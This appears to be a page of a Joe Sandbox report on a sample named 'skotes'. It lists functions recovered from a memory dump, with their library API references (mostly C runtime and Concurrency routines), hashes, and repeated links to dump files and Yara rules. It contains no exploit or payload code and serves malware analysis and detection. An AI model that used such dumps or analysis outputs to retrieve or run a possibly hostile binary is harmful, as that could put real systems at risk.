Function 007C4C14 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 007C4C98
__alloca_probe_16.LIBCMT ref: 007C4D5E
__freea.LIBCMT ref: 007C4DCA
__freea.LIBCMT ref: 007C4DD3
__freea.LIBCMT ref: 007C4DF6

Strings

=L-t, xrefs: 007C4C1B
Z{,m{, xrefs: 007C4C26

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16
String ID: =L-t$Z{,m{
API String ID: 3509577899-3218568333
Opcode ID: 2798c9b2de51ab84ef0c87288c477962b84cc9ab656523bd9b1e212ea9e0c075
Instruction ID: 8aecb23c907c5f8b45928fb226fb18e46dc1f7d10e48b21bf13f54f87d6fbc25
Opcode Fuzzy Hash: 2798c9b2de51ab84ef0c87288c477962b84cc9ab656523bd9b1e212ea9e0c075
Instruction Fuzzy Hash: F551C072600206ABEF31AE64DC55FFB3BA9EF84760F15012DFE05A7151EB78DC1086A0

Function 007A7364 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 80COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 007A73B0
Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 007A73F2
Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 007A740E
Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 007A7419
std::invalid_argument::invalid_argument.LIBCONCRT ref: 007A7440

Strings

ppVirtualProcessorRoots, xrefs: 007A7438
count, xrefs: 007A737E

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementstd::invalid_argument::invalid_argument
String ID: count$ppVirtualProcessorRoots
API String ID: 3897347962-3650809737
Opcode ID: 4fa878537c74c106f0ae4e99b5f0ed4ee32439f3360b4cc1fba791b846c2adf3
Instruction ID: 49d9141e62f14c805886ef9bf704b7134261c9c1c20e987c0ed5801ba9db83cb
Opcode Fuzzy Hash: 4fa878537c74c106f0ae4e99b5f0ed4ee32439f3360b4cc1fba791b846c2adf3
Instruction Fuzzy Hash: 41217474A00249EFCF18EF58D899AADBBB5FF8A350F544169E90597351DB38AE00CF90

Function 0079EE5F Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 0079EEBC
Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 0079EEC8
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0079EEE1
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0079EF0F
Concurrency::Context::Block.LIBCONCRT ref: 0079EF31

Strings

iy, xrefs: 0079EED0

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
String ID: iy
API String ID: 1182035702-1789661967
Opcode ID: 2f48fe8bd9d083e1fccbbf0bf728291f06e1647d3d76f156ab5b0400f9d8234b
Instruction ID: c066ca8b139cacf72a06a382cfa244139c4842e0c12ef431efd9cc83bb34a557
Opcode Fuzzy Hash: 2f48fe8bd9d083e1fccbbf0bf728291f06e1647d3d76f156ab5b0400f9d8234b
Instruction Fuzzy Hash: D6218370C10215DADF78DFA4E8496EEB7F1FF15360F100A2EE051A61D1E7795A44CB51

Function 007A78E1 Relevance: 12.1, APIs: 8, Instructions: 106timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 007A7903

Part of subcall function 007A5CB8: __EH_prolog3_catch.LIBCMT ref: 007A5CBF
Part of subcall function 007A5CB8: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 007A5CF8

Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 007A792A
Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 007A7936

Part of subcall function 007A5CB8: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 007A5D70
Part of subcall function 007A5CB8: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 007A5D7E

Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 007A7982
Concurrency::location::_Assign.LIBCMT ref: 007A79A3
Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 007A79AB
Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 007A79BD
Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 007A79ED

Part of subcall function 007A691D: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 007A6942
Part of subcall function 007A691D: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 007A6965

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Scheduler$ContextThrottling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_ExerciseFoundH_prolog3_catchNextProcessor::RingSchedulingSpinStartupTicket::TimerUntilWith
String ID:
API String ID: 1475861073-0
Opcode ID: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
Instruction ID: 9af66c616a16321ebd9cf97a83ae86bebecd485026ca1819f69eb1048f85309a
Opcode Fuzzy Hash: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
Instruction Fuzzy Hash: 5A31C331B08255AACF1AAB784C967FFB7B59FC7300F0443AAD495D7242DA2C6D4AC391

Function 007ADD18 Relevance: 10.6, APIs: 7, Instructions: 117threadCOMMON

Download Yara Rule

APIs

Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 007ADD91
Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 007ADDAE
Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 007ADE14
Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 007ADE29
Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 007ADE3B
Concurrency::details::InternalContextBase::CleanupDispatchedContextOnCancel.LIBCMT ref: 007ADE4B
Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 007ADE74

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Context$Base::Internal$ChoreWork$AssociatedCancelCleanupCompletionCreateCurrentDispatchedExecuteExecutedFoundInlineListThreadWait
String ID:
API String ID: 2885714658-0
Opcode ID: 9c8bc9f910bf508f2d7f5ac2dc8e9bd7c7d22020f5e31b6536735440a8726927
Instruction ID: dbbca4e3857e570f6890f173b33f76476e4d9826750908f26a3456ae658cc2a1
Opcode Fuzzy Hash: 9c8bc9f910bf508f2d7f5ac2dc8e9bd7c7d22020f5e31b6536735440a8726927
Instruction Fuzzy Hash: 2E419070A08244DACF25FBB484597ED77A16F97704F1446A9E8426F6C3DB3C9E04CB62

Function 007AE7AF Relevance: 10.6, APIs: 7, Instructions: 102COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 007AE7D7

Part of subcall function 007AE544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 007AE577
Part of subcall function 007AE544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 007AE599

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 007AE854
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 007AE860
Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 007AE86F
Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 007AE879
Concurrency::location::_Assign.LIBCMT ref: 007AE8AD
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 007AE8B5

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
